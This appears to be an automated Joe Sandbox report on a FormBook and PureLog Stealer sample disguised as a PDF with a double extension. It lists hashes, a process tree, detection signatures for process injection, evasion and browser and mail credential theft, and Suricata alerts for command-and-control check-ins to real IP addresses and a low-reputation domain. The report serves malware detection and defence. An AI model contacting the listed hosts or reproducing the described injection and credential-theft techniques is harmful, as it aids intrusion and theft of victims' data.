Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DO-COSU6387686280.pdf.exe

Overview

General Information

Sample name:DO-COSU6387686280.pdf.exe
Analysis ID:1562315
MD5:ad0da4a07f4866d67b266c8686f76081
SHA1:894f87c4af3b773215fdfec30606db22d179b7e8
SHA256:1cd3d14faf26873468674af56f8057334ac672b1579a538764ef87fc107deb52
Tags:exeuser-adrian__luca
Infos:

Detection

FormBook, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected FormBook
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • DO-COSU6387686280.pdf.exe (PID: 352 cmdline: "C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe" MD5: AD0DA4A07F4866D67B266C8686F76081)
    • DO-COSU6387686280.pdf.exe (PID: 2060 cmdline: "C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe" MD5: AD0DA4A07F4866D67B266C8686F76081)
      • EnLuReulIds.exe (PID: 5940 cmdline: "C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • mountvol.exe (PID: 3428 cmdline: "C:\Windows\SysWOW64\mountvol.exe" MD5: E0B3FFF7584298E77DFFB50796839FED)
          • EnLuReulIds.exe (PID: 6380 cmdline: "C:\Program Files (x86)\hLNpsIHmukIZoDRDxpFbCIICufiWlKehcOANmZAhCcJscOCNiHYcXedTEQJmYoLIhxFbKY\EnLuReulIds.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 4936 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Formbook, FormboFormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.
  • SWEED
  • Cobalt
https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000000.00000002.1444908234.0000000005E30000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
      00000006.00000002.3913848871.0000000003010000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        00000003.00000002.1770238639.0000000001400000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            Click to see the 6 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            0.2.DO-COSU6387686280.pdf.exe.5e30000.3.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              0.2.DO-COSU6387686280.pdf.exe.3d6e790.1.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                0.2.DO-COSU6387686280.pdf.exe.5e30000.3.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                  0.2.DO-COSU6387686280.pdf.exe.3d6e790.1.raw.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Suspicious Double Extension File Execution
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe", CommandLine: "C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, NewProcessName: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, OriginalFileName: C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4084, ProcessCommandLine: "C:\Users\user\Desktop\DO-COSU6387686280.pdf.exe", ProcessId: 352, ProcessName: DO-COSU6387686280.pdf.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-25T13:55:49.067574+010020507451Malware Command and Control Activity Detected192.168.2.849714202.61.233.6680TCP
                    2024-11-25T13:56:14.280884+010020507451Malware Command and Control Activity Detected192.168.2.849719172.67.129.3880TCP
                    2024-11-25T13:56:29.193972+010020507451Malware Command and Control Activity Detected192.168.2.849725209.74.77.10980TCP
                    2024-11-25T13:56:44.481170+010020507451Malware Command and Control Activity Detected192.168.2.84972938.181.21.8580TCP
                    2024-11-25T13:56:59.969225+010020507451Malware Command and Control Activity Detected192.168.2.849733195.110.124.13380TCP
                    2024-11-25T13:57:16.247743+010020507451Malware Command and Control Activity Detected192.168.2.849737163.44.185.18380TCP
                    2024-11-25T13:57:32.410829+010020507451Malware Command and Control Activity Detected192.168.2.849741118.107.250.10380TCP
                    2024-11-25T13:57:47.413211+010020507451Malware Command and Control Activity Detected192.168.2.84974513.248.169.4880TCP
                    2024-11-25T13:58:02.236284+010020507451Malware Command and Control Activity Detected192.168.2.84974984.32.84.3280TCP
                    2024-11-25T13:58:17.251012+010020507451Malware Command and Control Activity Detected192.168.2.849753104.21.24.19880TCP
                    2024-11-25T13:58:32.464882+010020507451Malware Command and Control Activity Detected192.168.2.84975766.29.137.1080TCP
                    2024-11-25T13:58:47.503193+010020507451Malware Command and Control Activity Detected192.168.2.84976137.140.192.20680TCP
                    2024-11-25T13:59:03.636767+010020507451Malware Command and Control Activity Detected192.168.2.849765199.59.243.22780TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-25T13:55:49.067574+010028554651A Network Trojan was detected192.168.2.849714202.61.233.6680TCP
                    2024-11-25T13:56:14.280884+010028554651A Network Trojan was detected192.168.2.849719172.67.129.3880TCP
                    2024-11-25T13:56:29.193972+010028554651A Network Trojan was detected192.168.2.849725209.74.77.10980TCP
                    2024-11-25T13:56:44.481170+010028554651A Network Trojan was detected192.168.2.84972938.181.21.8580TCP
                    2024-11-25T13:56:59.969225+010028554651A Network Trojan was detected192.168.2.849733195.110.124.13380TCP
                    2024-11-25T13:57:16.247743+010028554651A Network Trojan was detected192.168.2.849737163.44.185.18380TCP
                    2024-11-25T13:57:32.410829+010028554651A Network Trojan was detected192.168.2.849741118.107.250.10380TCP
                    2024-11-25T13:57:47.413211+010028554651A Network Trojan was detected192.168.2.84974513.248.169.4880TCP
                    2024-11-25T13:58:02.236284+010028554651A Network Trojan was detected192.168.2.84974984.32.84.3280TCP
                    2024-11-25T13:58:17.251012+010028554651A Network Trojan was detected192.168.2.849753104.21.24.19880TCP
                    2024-11-25T13:58:32.464882+010028554651A Network Trojan was detected192.168.2.84975766.29.137.1080TCP
                    2024-11-25T13:58:47.503193+010028554651A Network Trojan was detected192.168.2.84976137.140.192.20680TCP
                    2024-11-25T13:59:03.636767+010028554651A Network Trojan was detected192.168.2.849765199.59.243.22780TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-25T13:56:06.093405+010028554641A Network Trojan was detected192.168.2.849716172.67.129.3880TCP
                    2024-11-25T13:56:08.805473+010028554641A Network Trojan was detected192.168.2.849717172.67.129.3880TCP
                    2024-11-25T13:56:11.426007+010028554641A Network Trojan was detected192.168.2.849718172.67.129.3880TCP
                    2024-11-25T13:56:21.198374+010028554641A Network Trojan was detected192.168.2.849721209.74.77.10980TCP
                    2024-11-25T13:56:23.837299+010028554641A Network Trojan was detected192.168.2.849723209.74.77.10980TCP
                    2024-11-25T13:56:26.511818+010028554641A Network Trojan was detected192.168.2.849724209.74.77.10980TCP
                    2024-11-25T13:56:36.413440+010028554641A Network Trojan was detected192.168.2.84972638.181.21.8580TCP
                    2024-11-25T13:56:39.085307+010028554641A Network Trojan was detected192.168.2.84972738.181.21.8580TCP
                    2024-11-25T13:56:41.741523+010028554641A Network Trojan was detected192.168.2.84972838.181.21.8580TCP
                    2024-11-25T13:56:51.740869+010028554641A Network Trojan was detected192.168.2.849730195.110.124.13380TCP
                    2024-11-25T13:56:54.624676+010028554641A Network Trojan was detected192.168.2.849731195.110.124.13380TCP
                    2024-11-25T13:56:57.396791+010028554641A Network Trojan was detected192.168.2.849732195.110.124.13380TCP
                    2024-11-25T13:57:08.291965+010028554641A Network Trojan was detected192.168.2.849734163.44.185.18380TCP
                    2024-11-25T13:57:10.949462+010028554641A Network Trojan was detected192.168.2.849735163.44.185.18380TCP
                    2024-11-25T13:57:13.611612+010028554641A Network Trojan was detected192.168.2.849736163.44.185.18380TCP
                    2024-11-25T13:57:23.913704+010028554641A Network Trojan was detected192.168.2.849738118.107.250.10380TCP
                    2024-11-25T13:57:26.649123+010028554641A Network Trojan was detected192.168.2.849739118.107.250.10380TCP
                    2024-11-25T13:57:29.632280+010028554641A Network Trojan was detected192.168.2.849740118.107.250.10380TCP
                    2024-11-25T13:57:39.176819+010028554641A Network Trojan was detected192.168.2.84974213.248.169.4880TCP
                    2024-11-25T13:57:41.886045+010028554641A Network Trojan was detected192.168.2.84974313.248.169.4880TCP
                    2024-11-25T13:57:44.614649+010028554641A Network Trojan was detected192.168.2.84974413.248.169.4880TCP
                    2024-11-25T13:57:54.210712+010028554641A Network Trojan was detected192.168.2.84974684.32.84.3280TCP
                    2024-11-25T13:57:56.933477+010028554641A Network Trojan was detected192.168.2.84974784.32.84.3280TCP
                    2024-11-25T13:57:59.559833+010028554641A Network Trojan was detected192.168.2.84974884.32.84.3280TCP
                    2024-11-25T13:58:09.382237+010028554641A Network Trojan was detected192.168.2.849750104.21.24.19880TCP
                    2024-11-25T13:58:11.851475+010028554641A Network Trojan was detected192.168.2.849751104.21.24.19880TCP
                    2024-11-25T13:58:14.725976+010028554641A Network Trojan was detected192.168.2.849752104.21.24.19880TCP
                    2024-11-25T13:58:24.434110+010028554641A Network Trojan was detected192.168.2.84975466.29.137.1080TCP
                    2024-11-25T13:58:27.003955+010028554641A Network Trojan was detected192.168.2.84975566.29.137.1080TCP
                    2024-11-25T13:58:29.746107+010028554641A Network Trojan was detected192.168.2.84975666.29.137.1080TCP
                    2024-11-25T13:58:39.618490+010028554641A Network Trojan was detected192.168.2.84975837.140.192.20680TCP
                    2024-11-25T13:58:42.163649+010028554641A Network Trojan was detected192.168.2.84975937.140.192.20680TCP
                    2024-11-25T13:58:44.833531+010028554641A Network Trojan was detected192.168.2.84976037.140.192.20680TCP
                    2024-11-25T13:58:55.373235+010028554641A Network Trojan was detected192.168.2.849762199.59.243.22780TCP
                    2024-11-25T13:58:58.414028+010028554641A Network Trojan was detected192.168.2.849763199.59.243.22780TCP
                    2024-11-25T13:59:00.945944+010028554641A Network Trojan was detected192.168.2.849764199.59.243.22780TCP
                    2024-11-25T13:59:12.161249+010028554641A Network Trojan was detected192.168.2.849766194.58.112.17480TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: DO-COSU6387686280.pdf.exeAvira: detected
                    Multi AV Scanner detection for submitted file
                    Source: DO-COSU6387686280.pdf.exeReversingLabs: Detection: 39%
                    Yara detected FormBook
                    Source: Yara matchFile source: 00000003.00000002.1767827302.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3913848871.0000000003010000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1770238639.0000000001400000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3902764512.0000000002A20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.3916754998.0000000005090000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000002.3913780105.0000000002FC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000003.00000002.1772985722.0000000001D40000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000005.00000002.3913539434.0000000003190000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for sample
                    Source: DO-COSU6387686280.pdf.exeJoe Sandbox ML: detected
                    Source: DO-COSU6387686280.pdf.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: DO-COSU6387686280.pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: mountvol.pdb source: DO-COSU6387686280.pdf.exe, 00000003.00000002.1770656138.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, EnLuReulIds.exe, 00000005.00000002.3910776673.0000000001508000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: EnLuReulIds.exe, 00000005.00000002.3902761074.000000000073E000.00000002.00000001.01000000.0000000C.sdmp, EnLuReulIds.exe, 00000007.00000002.3902762226.000000000073E000.00000002.00000001.01000000.0000000C.sdmp
                    Source: Binary string: mountvol.pdbGCTL source: DO-COSU6387686280.pdf.exe, 00000003.00000002.1770656138.00000000014A8000.00000004.00000020.00020000.00000000.sdmp, EnLuReulIds.exe, 00000005.00000002.3910776673.0000000001508000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdbUGP source: DO-COSU6387686280.pdf.exe, 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1771236045.0000000002D55000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1774501211.0000000002F04000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                    Source: Binary string: wntdll.pdb source: DO-COSU6387686280.pdf.exe, DO-COSU6387686280.pdf.exe, 00000003.00000002.1770776341.0000000001760000.00000040.00001000.00020000.00000000.sdmp, mountvol.exe, mountvol.exe, 00000006.00000002.3913934846.00000000030B0000.00000040.00001000.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1771236045.0000000002D55000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000003.1774501211.0000000002F04000.00000004.00000020.00020000.00000000.sdmp, mountvol.exe, 00000006.00000002.3913934846.000000000324E000.00000040.00001000.00020000.00000000.sdmp
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 6_2_02A3C870 FindFirstFileW,FindNextFileW,FindClose,6_2_02A3C870
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 4x nop then xor eax, eax6_2_02A29F00
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 4x nop then pop edi6_2_02A2E37F
                    Source: C:\Windows\SysWOW64\mountvol.exeCode function: 4x nop then mov ebx, 00000004h6_2_034B04DE

                    Networking

                    barindex
                    Suricata IDS alerts for network traffic
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49740 -> 118.107.250.103:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49742 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49719 -> 172.67.129.38:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49719 -> 172.67.129.38:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49718 -> 172.67.129.38:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49757 -> 66.29.137.10:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49757 -> 66.29.137.10:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49737 -> 163.44.185.183:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49755 -> 66.29.137.10:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49726 -> 38.181.21.85:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49744 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49749 -> 84.32.84.32:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49749 -> 84.32.84.32:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49751 -> 104.21.24.198:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49716 -> 172.67.129.38:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49761 -> 37.140.192.206:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49761 -> 37.140.192.206:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49727 -> 38.181.21.85:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49714 -> 202.61.233.66:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49728 -> 38.181.21.85:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49714 -> 202.61.233.66:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49753 -> 104.21.24.198:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49753 -> 104.21.24.198:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49736 -> 163.44.185.183:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49746 -> 84.32.84.32:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49764 -> 199.59.243.227:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49723 -> 209.74.77.109:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49729 -> 38.181.21.85:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49729 -> 38.181.21.85:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49737 -> 163.44.185.183:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49748 -> 84.32.84.32:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49732 -> 195.110.124.133:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49730 -> 195.110.124.133:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49734 -> 163.44.185.183:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49762 -> 199.59.243.227:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49754 -> 66.29.137.10:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49735 -> 163.44.185.183:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49745 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49745 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49758 -> 37.140.192.206:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49752 -> 104.21.24.198:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49750 -> 104.21.24.198:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49721 -> 209.74.77.109:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49760 -> 37.140.192.206:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49763 -> 199.59.243.227:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49733 -> 195.110.124.133:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49733 -> 195.110.124.133:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49766 -> 194.58.112.174:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49725 -> 209.74.77.109:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49725 -> 209.74.77.109:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49759 -> 37.140.192.206:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49743 -> 13.248.169.48:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49739 -> 118.107.250.103:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49747 -> 84.32.84.32:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49765 -> 199.59.243.227:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49765 -> 199.59.243.227:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49756 -> 66.29.137.10:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49717 -> 172.67.129.38:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49724 -> 209.74.77.109:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49731 -> 195.110.124.133:80
                    Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.8:49738 -> 118.107.250.103:80
                    Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.8:49741 -> 118.107.250.103:80
                    Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.8:49741 -> 118.107.250.103:80
                    Performs DNS queries to domains with low reputation
                    Source: DNS query: www.futuru.xyz
                    Source: Joe Sandbox ViewIP Address: 209.74.77.109 209.74.77.109
                    Source: Joe Sandbox ViewIP Address: 13.248.169.48 13.248.169.48
                    Source: Joe Sandbox ViewASN Name: AS-REGRU AS-REGRU
                    Source: Joe Sandbox ViewASN Name: MULTIBAND-NEWHOPEUS MULTIBAND-NEWHOPEUS
                    Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
                    Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
